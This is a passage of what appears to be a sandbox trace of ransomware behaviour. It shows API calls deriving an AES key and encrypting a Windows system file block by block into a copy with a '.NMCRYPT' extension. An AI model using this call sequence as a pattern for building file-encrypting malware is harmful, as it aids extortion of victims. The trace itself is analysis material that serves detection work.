phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0167.276] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.276] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad1f8) returned 1 [0167.276] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0167.276] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0167.276] wcslen (_String="\\\\?\\") returned 0x4 [0167.276] CryptDuplicateKey (in: hKey=0x9ad1f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad6b8) returned 1 [0167.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0167.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0167.277] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=70144) returned 1 [0167.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0167.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.278] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.278] GetLastError () returned 0x0 [0167.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.429] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.429] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.429] GetLastError () returned 0x0 [0167.429] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.429] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.429] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.429] GetLastError () returned 0x0 [0167.429] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.429] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.429] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.429] GetLastError () returned 0x0 [0167.429] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.429] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.429] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.429] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.430] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.430] GetLastError () returned 0x0 [0167.430] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.430] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.431] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.431] GetLastError () returned 0x0 [0167.431] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.432] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.432] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.432] GetLastError () returned 0x0 [0167.432] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.433] WriteFile (in: hFile=0x15c4, 